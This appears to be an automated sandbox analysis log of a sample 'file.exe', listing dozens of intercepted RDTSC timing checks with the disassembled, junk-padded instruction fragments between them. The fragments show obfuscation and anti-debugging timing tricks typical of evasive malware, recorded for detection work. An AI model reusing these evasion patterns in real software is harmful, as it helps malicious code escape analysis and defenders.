                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDF18 second address: 10BDF43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC408FC8B0Bh 0x00000010 jnp 00007FC408FC8B06h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE20D second address: 10BE21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FC408FC7016h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C23A2 second address: 10C23A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C23A6 second address: 10C23B0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C18FC second address: 10C190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B0Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C190C second address: 10C1925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1925 second address: 10C1937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C71 second address: 10C1C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C77 second address: 10C1C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FC408FC8B0Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C8D second address: 10C1C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C97 second address: 10C1C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1DF2 second address: 10C1DFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC408FC7016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1DFD second address: 10C1E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C88EB second address: 10C890D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7027h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8A82 second address: 10C8A8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8A8C second address: 10C8A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8DAE second address: 10C8DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8DB2 second address: 10C8DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FC408FC7016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC408FC7024h 0x00000015 jmp 00007FC408FC701Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8DD9 second address: 10C8DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B18h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9377 second address: 10C9382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9EB8 second address: 10C9EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9EBE second address: 10C9EC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9EC8 second address: 10C9ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1D5 second address: 10CA1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1D9 second address: 10CA1F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B12h 0x00000007 jg 00007FC408FC8B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1F9 second address: 10CA1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1FF second address: 10CA21E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC408FC8B16h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA21E second address: 10CA223 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA223 second address: 10CA229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA229 second address: 10CA247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC408FC7025h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA247 second address: 10CA24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA580 second address: 10CA584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA584 second address: 10CA58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA58D second address: 10CA593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA593 second address: 10CA5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B0Eh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5A6 second address: 10CA5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC408FC701Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnl 00007FC408FC7016h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5BF second address: 10CA609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B17h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC408FC8B0Eh 0x00000012 jmp 00007FC408FC8B11h 0x00000017 jl 00007FC408FC8B08h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA609 second address: 10CA60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF145 second address: 10CF149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF149 second address: 10CF179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC408FC701Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC701Bh 0x00000013 jmp 00007FC408FC7021h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF179 second address: 10CF17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D221F second address: 10D2223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2223 second address: 10D2242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B14h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2242 second address: 10D2248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2248 second address: 10D224E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D26DA second address: 10D26E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D26E0 second address: 10D26FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC408FC8B1Ah 0x0000000b jmp 00007FC408FC8B12h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D29E8 second address: 10D29EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2B71 second address: 10D2B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B18h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2E65 second address: 10D2E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAD3F second address: 10DAD4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FC408FC8B06h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAD4F second address: 10DAD62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC408FC701Ah 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D959D second address: 10D95A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D95A3 second address: 10D95AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC408FC7016h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9B80 second address: 10D9B91 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jng 00007FC408FC8B1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9CE5 second address: 10D9CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FC408FC7016h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DABE7 second address: 10DABEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1029DA1 second address: 1029DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jno 00007FC408FC7016h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1029DB8 second address: 1029DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1E5B second address: 10E1E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4AF9 second address: 10F4B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC408FC8B06h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4B04 second address: 10F4B3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 jmp 00007FC408FC7025h 0x0000000e jmp 00007FC408FC7028h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4B3C second address: 10F4B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F46CA second address: 10F46CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F46CE second address: 10F46D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F482A second address: 10F4832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDF33 second address: 10FDF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDF39 second address: 10FDF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103F3A second address: 1103F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC408FC8B19h 0x00000011 jmp 00007FC408FC8B0Dh 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103F6D second address: 1103F98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7025h 0x00000007 jc 00007FC408FC701Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103F98 second address: 1103FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103FA1 second address: 1103FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7025h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103FBA second address: 1103FC9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC408FC8B06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110CCAB second address: 110CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110CCAF second address: 110CCD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FC408FC8B06h 0x00000010 jmp 00007FC408FC8B15h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B714 second address: 110B718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B718 second address: 110B73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC408FC8B0Bh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B73B second address: 110B773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7027h 0x00000007 js 00007FC408FC701Eh 0x0000000d push eax 0x0000000e pop eax 0x0000000f jng 00007FC408FC7016h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007FC408FC7016h 0x00000020 jnl 00007FC408FC7016h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B773 second address: 110B779 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8CA second address: 110B8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020895 second address: 502089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502089B second address: 502089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502089F second address: 50208DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FC408FC8B0Fh 0x00000010 and ecx, 1Fh 0x00000013 jmp 00007FC408FC8B16h 0x00000018 ror eax, cl 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop esi 0x0000001f movsx ebx, ax 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208DD second address: 50208E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208E5 second address: 5020920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 jmp 00007FC408FC8B19h 0x0000000d retn 0004h 0x00000010 nop 0x00000011 mov esi, eax 0x00000013 lea eax, dword ptr [ebp-08h] 0x00000016 xor esi, dword ptr [00EB2014h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push eax 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 push eax 0x00000023 call 00007FC40D17934Fh 0x00000028 push FFFFFFFEh 0x0000002a pushad 0x0000002b jmp 00007FC408FC8B0Ch 0x00000030 popad 0x00000031 pop eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020920 second address: 5020924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020924 second address: 502092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502092A second address: 5020930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020930 second address: 5020934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020934 second address: 502095F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC40D17788Ch 0x00000010 mov edi, edi 0x00000012 jmp 00007FC408FC7029h 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502095F second address: 5020963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020963 second address: 5020976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020976 second address: 5020A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC408FC8B17h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 movzx esi, dx 0x00000017 call 00007FC408FC8B17h 0x0000001c pop ecx 0x0000001d popad 0x0000001e call 00007FC408FC8B19h 0x00000023 pushfd 0x00000024 jmp 00007FC408FC8B10h 0x00000029 sub si, E518h 0x0000002e jmp 00007FC408FC8B0Bh 0x00000033 popfd 0x00000034 pop ecx 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FC408FC8B0Fh 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC408FC8B15h 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A1E second address: 5020A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD006A second address: 4FD0079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
